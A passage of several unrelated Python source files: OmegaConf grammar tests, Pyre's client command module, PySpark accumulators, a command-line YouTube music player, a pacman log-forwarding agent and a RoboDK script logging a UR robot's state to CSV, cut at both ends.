expressions that do not contain interpolations (which allows for faster tests without using any config object). Tests that actually need a config object all re-use the same `BASE_TEST_CFG` config, to avoid creating a new config for each test. """ @parametrize_from(PARAMS_SINGLE_ELEMENT_NO_INTERPOLATION) def test_single_element_no_interpolation( self, definition: str, expected: Any ) -> None: parse_tree, expected_visit = self._parse("singleElement", definition, expected) if parse_tree is None: return # Since there are no interpolations here, we do not need to provide # callbacks to resolve them, and the quoted string callback can simply # be the identity. visitor = grammar_visitor.GrammarVisitor( node_interpolation_callback=None, # type: ignore resolver_interpolation_callback=None, # type: ignore memo=None, ) self._visit(lambda: visitor.visit(parse_tree), expected_visit) @parametrize_from(PARAMS_SINGLE_ELEMENT_WITH_INTERPOLATION) def test_single_element_with_resolver( self, restore_resolvers: Any, definition: str, expected: Any ) -> None: parse_tree, expected_visit = self._parse("singleElement", definition, expected) OmegaConf.register_new_resolver("test", self._resolver_test) OmegaConf.register_new_resolver("first", self._resolver_first) OmegaConf.register_new_resolver("ns1.ns2.test", self._resolver_test) self._visit_with_config(parse_tree, expected_visit) @parametrize_from(PARAMS_CONFIG_VALUE) def test_config_value( self, restore_resolvers: Any, definition: str, expected: Any ) -> None: parse_tree, expected_visit = self._parse("configValue", definition, expected) OmegaConf.register_new_resolver("test", self._resolver_test) self._visit_with_config(parse_tree, expected_visit) @parametrize_from( [ ("trailing_comma", "${test:a,b,}", ["a", "b", ""]), ("empty_middle", "${test:a,,b}", ["a", "", "b"]), ("empty_first", "${test:,a,b}", ["", "a", "b"]), ("single_comma", "${test:,}", ["", ""]), ( "mixed_with_ws", "${test: ,a,b,\t,,c, \t \t ,d,, \t}", ["", "a", "b", "", "", "c", "", "d", "", ""], ), ] ) def test_deprecated_empty_args( self, restore_resolvers: Any, definition: str, expected: Any ) -> None: OmegaConf.register_new_resolver("test", self._resolver_test) parse_tree, expected_visit = self._parse("singleElement", definition, expected) with warns( UserWarning, match=re.escape("https://github.com/omry/omegaconf/issues/572") ): self._visit_with_config(parse_tree, expected_visit) def _check_is_same_type(self, value: Any, expected: Any) -> None: """ Helper function to validate that types of `value` and `expected are the same. This function assumes that `value == expected` holds, and performs a "deep" comparison of types (= it goes into data structures like dictionaries, lists and tuples). Note that dictionaries being compared must have keys ordered the same way! """ assert type(value) is type(expected) if isinstance(value, (str, int, float)): pass elif isinstance(value, (list, tuple, ListConfig)): for vx, ex in zip(value, expected): self._check_is_same_type(vx, ex) elif isinstance(value, (dict, DictConfig)): for (vk, vv), (ek, ev) in zip(value.items(), expected.items()): assert vk == ek, "dictionaries are not ordered the same" self._check_is_same_type(vk, ek) self._check_is_same_type(vv, ev) elif value is None: assert expected is None else: raise NotImplementedError(type(value)) def _get_expected(self, expected: Any) -> Tuple[Any, Any]: """Obtain the expected result of the parse & visit steps""" if isinstance(expected, tuple): # Outcomes of both the parse and visit steps are provided. assert len(expected) == 2 return expected[0], expected[1] elif expected is GrammarParseError: # If only a `GrammarParseError` is expected, assume it happens in parse step. return expected, None else: # If anything else is provided, assume it is the outcome of the visit step. return None, expected def _get_lexer_mode(self, rule: str) -> str: return {"configValue": "DEFAULT_MODE", "singleElement": "VALUE_MODE"}[rule] def _parse( self, rule: str, definition: str, expected: Any ) -> Tuple[Optional[antlr4.ParserRuleContext], Any]: """ Parse the expression given by `definition`. Return both the parse tree and the expected result when visiting this tree. """ def get_tree() -> antlr4.ParserRuleContext: return grammar_parser.parse( value=definition, parser_rule=rule, lexer_mode=self._get_lexer_mode(rule), ) expected_parse, expected_visit = self._get_expected(expected) if expected_parse is None: return get_tree(), expected_visit else: # expected failure on the parse step with raises(expected_parse): get_tree() return None, None def _resolver_first(self, item: Any, *_: Any) -> Any: """Resolver that returns the first element of its first input""" try: return next(iter(item)) except StopIteration: assert False # not supposed to happen in current tests def _resolver_test(self, *args: Any) -> Any: """Resolver that returns the list of its inputs""" return args[0] if len(args) == 1 else list(args) def _visit(self, visit: Callable[[], Any], expected: Any) -> None: """Run the `visit()` function to visit the parse tree and validate the result""" if isinstance(expected, type) and issubclass(expected, Exception): with raises(expected): visit() else: result = visit() if expected is math.nan: # Special case since nan != nan. assert math.isnan(result) else: assert result == expected # We also check types in particular because instances of `Node` are very # good at mimicking their underlying type's behavior, and it is easy to # fail to notice that the result contains nodes when it should not. self._check_is_same_type(result, expected) def _visit_with_config( self, parse_tree: antlr4.ParserRuleContext, expected: Any ) -> None: """Visit the tree using the default config `BASE_TEST_CFG`""" if parse_tree is None: return cfg = BASE_TEST_CFG def visit() -> Any: return _utils._get_value( cfg.resolve_parse_tree( parse_tree, # Create a dummy `AnyNode` (it should not actually be used in these # grammer tests, but `resolve_parse_tree()` requires it). node=AnyNode(None, parent=cfg), key=None, parent=cfg, ) ) self._visit(visit, expected) @mark.parametrize( "expression", [ "${foo}", "${foo.bar}", "${a_b.c123}", "${ foo \t}", "x ${ab.cd.ef.gh} y", "$ ${foo} ${bar} ${boz} $", "${foo:bar}", "${foo-bar:bar-foo}", "${foo : bar, baz, boz}", "${foo:bar,0,a-b+c*d/$.%@?|}", r"\${foo}", "${foo.bar:boz}", "${$foo.bar$.x$y}", "${$0.1.2$}", "${0foo}", # getitem syntax "${foo[bar]}", "${foo.bar[baz]}", "${foo[bar].baz}", "${foo[bar].baz[boz]}", "${[foo]}", "${[foo].bar}", "${[foo][bar]}", # relative interpolations "${..foo}", "${..foo.bar}", "${..foo[bar]}", "${..[foo].bar}", ], ) class TestMatchSimpleInterpolationPattern: def test_regex(self, expression: str) -> None: assert grammar_parser.SIMPLE_INTERPOLATION_PATTERN.match(expression) is not None def test_grammar_consistency(self, expression: str) -> None: # The expression should be valid according to the grammar. grammar_parser.parse( value=expression, parser_rule="configValue", lexer_mode="DEFAULT_MODE", ) @mark.parametrize( ("expression", "is_valid_grammar"), [ # Also invalid according to the grammar. ("${.}", False), ("${..}", False), ("${}", False), ("${foo", False), ("${0foo:bar}", False), ("${foo . bar}", False), ("${ns . f:var}", False), ("${$foo:bar}", False), ("${.foo:bar}", False), (r"${foo:\}", False), # Valid according to the grammar but not matched by the regex. ("${foo.${bar}}", True), ("${foo:${bar}}", True), ("${foo:'hello'}", True), (r"\${foo", True), ], ) class TestDoNotMatchSimpleInterpolationPattern: def test_regex(self, expression: str, is_valid_grammar: bool) -> None: assert grammar_parser.SIMPLE_INTERPOLATION_PATTERN.match(expression) is None def test_grammar_consistency(self, expression: str, is_valid_grammar: bool) -> None: ctx: Any = nullcontext() if is_valid_grammar else raises(GrammarParseError) with ctx: grammar_parser.parse( value=expression, parser_rule="configValue", lexer_mode="DEFAULT_MODE", ) def test_empty_stack() -> None: """ Check that an empty stack during ANTLR parsing raises a `GrammarParseError`. """ with raises(GrammarParseError): grammar_parser.parse("ab}", lexer_mode="VALUE_MODE") @mark.parametrize( ("inter", "key", "expected"), [ # config root # simple param("${dict.bar}", "", 20, id="dict_value"), param("${dict}", "", {"bar": 20}, id="dict_node"), param("${list}", "", [1, 2], id="list_node"), param("${list.0}", "", 1, id="list_value"), # relative param( "${..list}", "dict", [1, 2], id="relative:list_from_dict", ), param("${..list.1}", "dict", 2, id="up_down"), param("${..[list][1]}", "dict", 2, id="up_down_getitem"), ], ) def test_parse_interpolation(inter: Any, key: Any, expected: Any) -> None: cfg = OmegaConf.create( { "dict": {"bar": 20}, "list": [1, 2], }, ) root = OmegaConf.select(cfg, key) tree = grammar_parser.parse( parser_rule="singleElement", value=inter, lexer_mode="VALUE_MODE", ) def callback(inter_key: Any, memo: Optional[Set[int]]) -> Any: assert isinstance(root, Container) ret = root._resolve_node_interpolation(inter_key=inter_key, memo=memo) return ret visitor = grammar_visitor.GrammarVisitor( node_interpolation_callback=callback, resolver_interpolation_callback=None, # type: ignore memo=None, ) ret = visitor.visit(tree) assert ret == expected def test_custom_resolver_param_supported_chars() -> None: supported_chars = r"abc123_:" + UNQUOTED_SPECIAL c = OmegaConf.create({"dir1": "${copy:" + supported_chars + "}"}) OmegaConf.register_new_resolver("copy", lambda x: x) assert c.dir1 == supported_chars def test_valid_chars_in_interpolation() -> None: valid_chars = "".join( chr(i) for i in range(33, 128) if chr(i) not in INVALID_CHARS_IN_KEY_NAMES ) cfg_dict = {valid_chars: 123, "inter": f"${{{valid_chars}}}"} cfg = OmegaConf.create(cfg_dict) # Test that we can access the node made of all valid characters, both # directly and through interpolations. assert cfg[valid_chars] == 123 assert cfg.inter == 123 @mark.parametrize("c", list(INVALID_CHARS_IN_KEY_NAMES)) def test_invalid_chars_in_interpolation(c: str) -> None: def create() -> DictConfig: return OmegaConf.create({"invalid": f"${{ab{c}de}}"}) # Test that all invalid characters trigger errors in interpolations. if c in [".", "}"]: # With '.', we try to access `${ab.de}`. # With '}', we try to access `${ab}`. cfg = create() with raises(InterpolationKeyError): cfg.invalid elif c == ":": # With ':', we try to run a resolver `${ab:de}` cfg = create() with raises(UnsupportedInterpolationType): cfg.invalid else: # Other invalid characters should be detected at creation time. with raises(GrammarParseError): create() def test_grammar_cache_is_thread_safe() -> None: """ This test ensures that we can parse strings across multiple threads in parallel. Besides ensuring that the parsing does not hang nor crash, we also verify that the lexer used in each thread is different. """ n_threads = 10 lexer_ids = [] stop = threading.Event() def check_cache_lexer_id() -> None: # Parse a dummy string to make sure the grammar cache is populated # (this also checks that multiple threads can parse in parallel). grammar_parser.parse("foo") # Keep track of the ID of the cached lexer. lexer_ids.append(id(grammar_parser._grammar_cache.data[0])) # Wait until we are done. while not stop.is_set(): time.sleep(0.1) # Launch threads. threads = [] for i in range(n_threads): threads.append(threading.Thread(target=check_cache_lexer_id)) threads[-1].start() # Wait until all threads have reported their lexer ID. while len(lexer_ids) < n_threads: time.sleep(0.1) # Terminate threads. stop.set() for thread in threads: thread.join() # Check that each thread used a unique lexer. assert len(set(lexer_ids)) == n_threads
command.py
# Copyright (c) 2016-present, Facebook, Inc. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import enum import logging import os import re import resource import signal import subprocess import threading from abc import abstractmethod from typing import List, Set # noqa from .. import EnvironmentException, log from ..filesystem import AnalysisDirectory LOG = logging.getLogger(__name__) class ClientException(Exception): pass class State(enum.IntEnum): DEAD = 0 RUNNING = 1 class ExitCode(enum.IntEnum): SUCCESS = 0 FOUND_ERRORS = 1 FAILURE = 2 # If the process exited due to a signal, this will be the negative signal number. SIGSEGV = -signal.SIGSEGV class Result: def __init__(self, code, output) -> None: self.code = code self.output = output def check(self) -> None: if self.code != ExitCode.SUCCESS: description = ":\n{}".format(self.output) if self.output else "" if self.code == ExitCode.SIGSEGV: description += ( "\nThis is a Pyre bug. Please re-run Pyre with --debug " "and provide the output to the developers." ) raise ClientException( "Client exited with error code {}{}".format(self.code, description) ) class Command: _buffer = [] # type: List[str] _call_client_terminated = False # type: bool _exit_code = ExitCode.SUCCESS # type: ExitCode def __init__( self, arguments, configuration, analysis_directory: AnalysisDirectory ) -> None: self._arguments = arguments self._configuration = configuration self._analysis_directory = analysis_directory self._debug = arguments.debug self._sequential = arguments.sequential self._strict = arguments.strict self._run_additional_checks = arguments.run_additional_checks self._show_error_traces = arguments.show_error_traces self._verbose = arguments.verbose self._show_parse_errors = arguments.show_parse_errors self._logging_sections = arguments.logging_sections self._capable_terminal = arguments.capable_terminal self._log_identifier = arguments.log_identifier self._logger = arguments.logger or (configuration and configuration.logger) self._original_directory = arguments.original_directory self._current_directory = arguments.current_directory if arguments.local_configuration: self._local_root = ( arguments.local_configuration if os.path.isdir(arguments.local_configuration) else os.path.dirname(arguments.local_configuration) ) else: self._local_root = arguments.original_directory def run(self) -> "Command": self._run() return self def exit_code(self) -> int: return self._exit_code @abstractmethod def _run(self) -> None: """ Abstract method expected to be overridden by subclasses. """ pass def _flags(self) -> List[str]: flags = [] if self._debug: flags.extend(["-debug"]) if self._sequential: flags.extend(["-sequential"]) if self._strict: flags.extend(["-strict"]) if self._run_additional_checks: flags.extend(["-run-additional-checks"]) if self._show_error_traces: flags.append("-show-error-traces") if self._verbose: flags.append("-verbose") if self._show_parse_errors: if self._logging_sections: self._logging_sections = self._logging_sections + ",parser" else: self._logging_sections = "parser" if not self._capable_terminal: # Disable progress reporting for non-capable terminals. # This helps in reducing clutter. if self._logging_sections: self._logging_sections = self._logging_sections + ",-progress" else: self._logging_sections = "-progress" if self._logging_sections: flags.extend(["-logging-sections", self._logging_sections]) if self._current_directory: flags.extend(["-project-root", self._current_directory]) if self._log_identifier: flags.extend(["-log-identifier", self._log_identifier]) if self._logger: flags.extend(["-logger", self._logger]) return flags def _read_stdout(self, stdout) -> None: self._buffer = [] for line in stdout: self._buffer.append(line.decode()) def _read_stderr(self, stream, _analysis_directory) -> None: buffer = None log_pattern = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (\w+) (.*)") try: for line in stream: if self._call_client_terminated: return line = line.decode().rstrip() match = log_pattern.match(line) if match: if buffer: buffer.flush() buffer = log.Buffer( section=match.groups()[0], data=[match.groups()[1]] ) elif buffer: buffer.append(line) if buffer: buffer.flush() except Exception: pass def _call_client(self, command, capture_output: bool = True) -> Result: if not os.path.isdir(self._analysis_directory.get_root()): raise EnvironmentException( "`{}` is not a link tree.".format(self._analysis_directory.get_root()) ) client_command = [self._configuration.binary, command] client_command.extend(self._flags()) client_command.append(self._analysis_directory.get_root()) def limit_memory_usage(): try: limit = 20 * 1024 * 1024 * 1024 # 20 GB resource.setrlimit(resource.RLIMIT_AS, (limit, limit)) except OSError: # Run the process with unlimited memory if the underlying syscall fails. pass LOG.debug("Running `%s`", " ".join(client_command)) with subprocess.Popen( client_command, stdout=subprocess.PIPE if capture_output else None, stderr=subprocess.PIPE, preexec_fn=limit_memory_usage, ) as process: # Read stdout output if capture_output: stdout_reader = threading.Thread( target=self._read_stdout, args=(process.stdout,) ) stdout_reader.daemon = True stdout_reader.start() # Read the error output and print it. self._call_client_terminated = False stderr_reader = threading.Thread( target=self._read_stderr, args=(process.stderr, self._analysis_directory.get_root()), ) stderr_reader.daemon = True stderr_reader.start() # Wait for the process to finish and clean up. process.wait() self._call_client_terminated = True if capture_output: # pyre-fixme: stdout_reader is not always declared! stdout_reader.join() output = "" if capture_output: output = "".join(self._buffer) if process.returncode != 0 and capture_output: output = "".join(self._buffer) return Result(code=process.returncode, output=output) def _relative_path(self, path) -> str: # pyre-fixme: Expected str, got bytes return os.path.relpath(path, self._original_directory) def _state(self) -> State: pid_path = os.path.join( self._analysis_directory.get_root(), ".pyre/server/server.pid" ) try: with open(pid_path) as file: pid = int(file.read()) os.kill(pid, 0) # throws if process is not running return State.RUNNING except Exception: return State.DEAD def _server_string(self, analysis_directory=None) -> str: if not analysis_directory: analysis_directory = self._analysis_directory.get_root() return "server{}".format("" if len(analysis_directory) < 2 else "s") def _analysis_directory_string(self) -> str: return "`{}`".format(self._analysis_directory.get_root())
accumulators.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import sys import select import struct import socketserver as SocketServer import threading from pyspark.serializers import read_int, CPickleSerializer __all__ = ["Accumulator", "AccumulatorParam"] pickleSer = CPickleSerializer() # Holds accumulators registered on the current machine, keyed by ID. This is then used to send # the local accumulator updates back to the driver program at the end of a task. _accumulatorRegistry = {} def _deserialize_accumulator(aid, zero_value, accum_param): from pyspark.accumulators import _accumulatorRegistry # If this certain accumulator was deserialized, don't overwrite it. if aid in _accumulatorRegistry: return _accumulatorRegistry[aid] else: accum = Accumulator(aid, zero_value, accum_param) accum._deserialized = True _accumulatorRegistry[aid] = accum return accum class Accumulator: """ A shared variable that can be accumulated, i.e., has a commutative and associative "add" operation. Worker tasks on a Spark cluster can add values to an Accumulator with the `+=` operator, but only the driver program is allowed to access its value, using `value`. Updates from the workers get propagated automatically to the driver program. While :class:`SparkContext` supports accumulators for primitive data types like :class:`int` and :class:`float`, users can also define accumulators for custom types by providing a custom :py:class:`AccumulatorParam` object. Refer to its doctest for an example. Examples -------- >>> a = sc.accumulator(1) >>> a.value 1 >>> a.value = 2 >>> a.value 2 >>> a += 5 >>> a.value 7 >>> sc.accumulator(1.0).value 1.0 >>> sc.accumulator(1j).value 1j >>> rdd = sc.parallelize([1,2,3]) >>> def f(x): ... global a ... a += x >>> rdd.foreach(f) >>> a.value 13 >>> b = sc.accumulator(0) >>> def g(x): ... b.add(x) >>> rdd.foreach(g) >>> b.value 6 >>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): ... Py4JJavaError: ... >>> def h(x): ... global a ... a.value = 7 >>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): ... Py4JJavaError: ... >>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): ... TypeError: ... """ def __init__(self, aid, value, accum_param): """Create a new Accumulator with a given initial value and AccumulatorParam object""" from pyspark.accumulators import _accumulatorRegistry self.aid = aid self.accum_param = accum_param self._value = value self._deserialized = False _accumulatorRegistry[aid] = self def __reduce__(self): """Custom serialization; saves the zero value from our AccumulatorParam""" param = self.accum_param return (_deserialize_accumulator, (self.aid, param.zero(self._value), param)) @property def value(self): """Get the accumulator's value; only usable in driver program""" if self._deserialized: raise RuntimeError("Accumulator.value cannot be accessed inside tasks") return self._value @value.setter def value(self, value): """Sets the accumulator's value; only usable in driver program""" if self._deserialized: raise RuntimeError("Accumulator.value cannot be accessed inside tasks") self._value = value def add(self, term): """Adds a term to this accumulator's value""" self._value = self.accum_param.addInPlace(self._value, term) def __iadd__(self, term): """The += operator; adds a term to this accumulator's value""" self.add(term) return self def __str__(self): return str(self._value) def __repr__(self): return "Accumulator<id=%i, value=%s>" % (self.aid, self._value) class AccumulatorParam: """ Helper object that defines how to accumulate values of a given type. Examples -------- >>> from pyspark.accumulators import AccumulatorParam >>> class VectorAccumulatorParam(AccumulatorParam): ... def zero(self, value): ... return [0.0] * len(value) ... def addInPlace(self, val1, val2): ... for i in range(len(val1)): ... val1[i] += val2[i] ... return val1 >>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam()) >>> va.value [1.0, 2.0, 3.0] >>> def g(x): ... global va ... va += [x] * 3 >>> rdd = sc.parallelize([1,2,3]) >>> rdd.foreach(g) >>> va.value [7.0, 8.0, 9.0] """ def zero(self, value): """ Provide a "zero value" for the type, compatible in dimensions with the provided `value` (e.g., a zero vector) """ raise NotImplementedError def addInPlace(self, value1, value2): """ Add two values of the accumulator's data type, returning a new value; for efficiency, can also update `value1` in place and return it. """ raise NotImplementedError class AddingAccumulatorParam(AccumulatorParam): """ An AccumulatorParam that uses the + operators to add values. Designed for simple types such as integers, floats, and lists. Requires the zero value for the underlying type as a parameter. """ def __init__(self, zero_value): self.zero_value = zero_value def zero(self, value): return self.zero_value def addInPlace(self, value1, value2): value1 += value2 return value1 # Singleton accumulator params for some standard types INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0) FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0) COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j) class _UpdateRequestHandler(SocketServer.StreamRequestHandler): """ This handler will keep polling updates from the same socket until the server is shutdown. """ def handle(self): from pyspark.accumulators import _accumulatorRegistry auth_token = self.server.auth_token def poll(func): while not self.server.server_shutdown: # Poll every 1 second for new data -- don't block in case of shutdown. r, _, _ = select.select([self.rfile], [], [], 1) if self.rfile in r: if func(): break def accum_updates(): num_updates = read_int(self.rfile) for _ in range(num_updates): (aid, update) = pickleSer._read_with_length(self.rfile) _accumulatorRegistry[aid] += update # Write a byte in acknowledgement self.wfile.write(struct.pack("!b", 1)) return False def authenticate_and_accum_updates(): received_token = self.rfile.read(len(auth_token)) if isinstance(received_token, bytes): received_token = received_token.decode("utf-8") if received_token == auth_token: accum_updates() # we've authenticated, we can break out of the first loop now return True else: raise ValueError( "The value of the provided token to the AccumulatorServer is not correct." ) # first we keep polling till we've received the authentication token poll(authenticate_and_accum_updates) # now we've authenticated, don't need to check for the token anymore poll(accum_updates) class AccumulatorServer(SocketServer.TCPServer): def __init__(self, server_address, RequestHandlerClass, auth_token): SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass) self.auth_token = auth_token """ A simple TCP server that intercepts shutdown() in order to interrupt our continuous polling on the handler. """ server_shutdown = False def shutdown(self): self.server_shutdown = True SocketServer.TCPServer.shutdown(self) self.server_close() def _start_update_server(auth_token): """Start a TCP server to receive accumulator updates in a daemon thread, and returns it""" server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token) thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start() return server if __name__ == "__main__": import doctest from pyspark.context import SparkContext globs = globals().copy() # The small batch size here ensures that we see multiple batches, # even in these small test examples: globs["sc"] = SparkContext("local", "test") (failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS) globs["sc"].stop() if failure_count: sys.exit(-1)
App.py
from Player import Player from getkey import getkey, keys import sys from itertools import cycle from time import sleep import threading import argparse from colorama import Fore CURSOR_UP_ONE = '\x1b[1A' ERASE_LINE = '\x1b[2K' QUIT_SEARCH = False QUIT_DISPLAY = False LINE_BUFFER = 0 # Launches chrome with YouTube landing page yt_music = Player() def delete_lines(n=1): for _ in range(n): sys.stdout.write(CURSOR_UP_ONE) sys.stdout.write(ERASE_LINE) def search_animation(): for _ in cycle(['|', '/', '-', '\\']): if QUIT_SEARCH: sys.stdout.write('\r\033[K') sys.stdout.flush() return print(Fore.LIGHTCYAN_EX + '\rSearching ' + _, end='\r'+ Fore.RESET) sleep(0.1) def display_info(): new_title = 'Idle' while True: if QUIT_DISPLAY: return try: title = yt_music.get_song_title() except: title = 'Idle' if new_title == title: continue else: global LINE_BUFFER delete_lines(LINE_BUFFER) LINE_BUFFER = 13 try: sleep(5) has_playlist = yt_music.get_playlist() if not has_playlist: playlist = 'No playlist associated with this song.' LINE_BUFFER -= 4 else: playlist = '\n'.join([track for track in has_playlist.values()]) except: playlist = 'Idle' LINE_BUFFER -= 4 controls = "New song: s\tPause: o\tNext song: p\tPrev song: i\tQuit: q\nSeek 5 seconds: ←/→\t" \ "Volume: ↑/↓\tMute: m\n " print((Fore.LIGHTCYAN_EX + f'Now Playing: {Fore.WHITE + title + Fore.RESET}\n\n'+ Fore.RESET) + (Fore.LIGHTCYAN_EX + f'Playlist:\n{Fore.WHITE + playlist + Fore.RESET}\n\n'+ Fore.RESET) + (Fore.LIGHTCYAN_EX + f'Controls:\n{Fore.WHITE + controls + Fore.RESET}\r' + Fore.RESET)) new_title = title sleep(0.1) def parse_args(): """ Parse muCLIar args :return: """ parser = argparse.ArgumentParser(description='muCLIar - Music from CLI') parser.add_argument('-s', '--song', type=str, help='Song name', required=True) parser.add_argument('-c', '--config', action='store_true') return parser.parse_args() def application(args): """ Event loop for Player :param args: Arguments from command line: song name (required), config (optional) :return: """ if args.config: res = yt_music.auth() if res == 0: print('Using stored credentials.') else: print('Logged in.') inf = threading.Thread(target=display_info) inf.start() global QUIT_SEARCH QUIT_SEARCH = False anim = threading.Thread(target=search_animation) anim.start() QUIT_SEARCH = yt_music.search(song=args.song) anim.join() key = '' while key != 'q': key = getkey() if key == 's': song = input(Fore.WHITE + 'Search new song: ' + Fore.RESET) delete_lines(1) QUIT_SEARCH = False anim = threading.Thread(target=search_animation) anim.start() QUIT_SEARCH = yt_music.search(song=song) anim.join() if key == 'i': yt_music.prev() elif key == 'o': yt_music.play_pause() elif key == 'p': yt_music.next() elif key == 'm': yt_music.mute() elif key == keys.LEFT: yt_music.backward() elif key == keys.RIGHT: yt_music.forward() elif key == keys.UP: yt_music.volume_up() elif key == keys.DOWN: yt_music.volume_down() elif key == 'q': global QUIT_DISPLAY QUIT_DISPLAY = True delete_lines(LINE_BUFFER) yt_music.quit() if __name__ == "__main__": arguments = parse_args() application(arguments)
pacman-log-agent.py
from datetime import datetime from pprint import pprint from threading import Thread import psutil, socket, json, re import time, sys, requests def filterLog(line, filter_by): if re.search(filter_by, line): return True return False def parseProcessInfo(): processDict = psutil.Process().as_dict(attrs=['pid', 'name']) return '{}[{}]'.format(processDict['name'], processDict['pid']) def parseLog(line): log = {} log["logged_time"] = str(datetime.strptime(line.split('] [')[0][1:], '%Y-%m-%d %H:%M')) log["severity"] = 'ALERT' if 'removed' in line else 'WARNING' if 'installed' in line else 'INFO' log["host"] = socket.gethostname() log["process"] = parseProcessInfo() log["message"] = {"content": '[{}'.format(line.split('] [')[1])} return log def readConf(): data = json.load(open('pacman-log-agent.conf')) return data['log_file_path'], data['filter'] if __name__ == '__main__': log_file_path, filter_by = readConf() logs = [] url = "http://localhost:3000/logs" if not len(sys.argv) == 2 else sys.argv[1] headers = {'Content-type': 'application/json'} def sendLogs(): while True: if len(logs) > 0: received_logs = list(logs) logs.clear() r = requests.post(url, json={"agent": "pacman", "logs": received_logs}, headers=headers) if r.status_code == 200: print('Logs have been sent successfully') return with open(log_file_path) as f: lines = f.readlines() for line in lines: line = line.rstrip() if filterLog(line, filter_by): logs.append(parseLog(line)) # Thread(target=sendLogs, daemon=True).start() sendLogs()
UR_Monitoring_CSV.py
# This script creates a thread to monitor the position and other variables from a real UR robot and stores the data to a CSV file # With this script running, RoboDK will save a CSV file of the robot status # # Press F5 to run the script # Or visit: http://www.robodk.com/doc/en/PythonAPI/ from robodk.robolink import * # API to communicate with RoboDK from robodk.robomath import * # Robot toolbox import threading import socket import struct import os import time TOLERANCE_JOINTS_REFRESH = 1e9 # Refresh the screen every time the robot position changes by this much (in deg) RETRIEVE_JOINTS_ONCE = False # If True, the current robot position will be retrieved once only SAVE_CSV_FILE = True # If True, the position and speed of the TCP will be recorded with a time stamp # Create targets given a tolerance in degrees CREATE_TARGETS = False TOLERANCE_JOINTS_NEWTARGET = 1e9 # tolerance in degrees REFRESH_RATE = 0.01 # Display rate in RoboDK # Make current robot joints accessible in case we run it on a separate thread global ROBOT_JOINTS # Procedure to check if robot joint positions are different according to a certain tolerance def Robot_Joints_Check(jA, jB, tolerance_deg=1): if jA is None: return True for i in range(6): if abs(jA[i] - jB[i]) > tolerance_deg * pi / 180: return True return False ######################################################################### # Byte shifts to point to the right byte data inside a packet UR_GET_TIME = 1 UR_GET_JOINT_POSITIONS = 252 # Real Joint Position UR_GET_JOINT_SPEEDS = 300 # Real Joint Speeds UR_GET_JOINT_CURRENTS = 348 UR_GET_TCP_POSITION = 444 # Real TCP position UR_GET_TCP_SPEED = 492 # Real TCP speed UR_GET_TCP_FORCES = 540 UR_GET_INPUTS = (86 - 32) * 8 + 252 UR_GET_OUTPUTS = (131 - 32) * 8 + 252 # Get packet size according to the byte array def packet_size(buf): if len(buf) < 4: return 0 return struct.unpack_from("!i", buf, 0)[0] # Check if a packet is complete def packet_check(buf): msg_sz = packet_size(buf) if len(buf) < msg_sz: print("Incorrect packet size %i vs %i" % (msg_sz, len(buf))) return False return True # Get specific information from a packet def packet_value(buf, offset, nval=6): if len(buf) < offset + nval: print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset)) return None fmt = '!' for i in range(nval): fmt += 'd' return list(struct.unpack_from(fmt, buf, offset)) #return list(struct.unpack_from("!dddddd", buf, offset)) # Get packet bits def packet_value_bin(buf, offset, nval=8): if len(buf) < offset + nval: print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset)) return None hex_list = '' return ''.join(format(x, '02x') for x in buf[offset:(offset + nval)]) ######################################################################### # Enter RoboDK IP and Port ROBOT_IP = None #'192.168.2.31' ROBOT_PORT = 30003 # Start RoboDK API RDK = Robolink() # Retrieve a robot robot = RDK.ItemUserPick('Select a UR robot to monitor', ITEM_TYPE_ROBOT) if not robot.Valid(): quit() robotname = robot.Name() print("Using robot %s" % robotname) # Retrieve Robot's IP: if ROBOT_IP is None: ip, port, path, ftpuser, ftppass = robot.ConnectionParams() ROBOT_IP = ip if SAVE_CSV_FILE: # Save monitoring to file: file_path = RDK.getParam('FILE_OPENSTATION')[:-4] + '_Monitoring_%s_%s.csv' % (robotname, time.strftime("%Y-%m-%d-%Hh%Mm%Ss", time.gmtime())) print("Monitoring robot %s to %s" % (robotname, file_path)) fid = open(file_path, 'w') fid.write('time (s), Speed (m/s), Speed (rad/s), J1 (deg), J2 (deg), J3 (deg), J4 (deg), J5 (deg), J6 (deg), TCP X (m), TCP Y (m), TCP Z (m), TCP u (rad), TCP v (rad), TCP w (rad), Speed X (m/s), Speed Y (m/s), Speed Z (m/s), Speed u (rad/s), Speed v (rad/s), Speed w (rad/s), Inputs, Outputs\n') tic() # Action to take when a new packet arrives def on_packet(packet, packet_id): global ROBOT_JOINTS # Retrieve desired information from a packet rob_joints_RAD = packet_value(packet, UR_GET_JOINT_POSITIONS) ROBOT_JOINTS = [ji * 180.0 / pi for ji in rob_joints_RAD] ROBOT_TCP_XYZUVW = packet_value(packet, UR_GET_TCP_POSITION) ROBOT_TCP_SPEED = packet_value(packet, UR_GET_TCP_SPEED) ROBOT_INPUTS = packet_value_bin(packet, UR_GET_INPUTS) ROBOT_OUTPUTS = packet_value_bin(packet, UR_GET_OUTPUTS) #print("Output:") #print(ROBOT_OUTPUTS) #ROBOT_SPEED = packet_value(packet, UR_GET_JOINT_SPEEDS) #ROBOT_CURRENT = packet_value(packet, 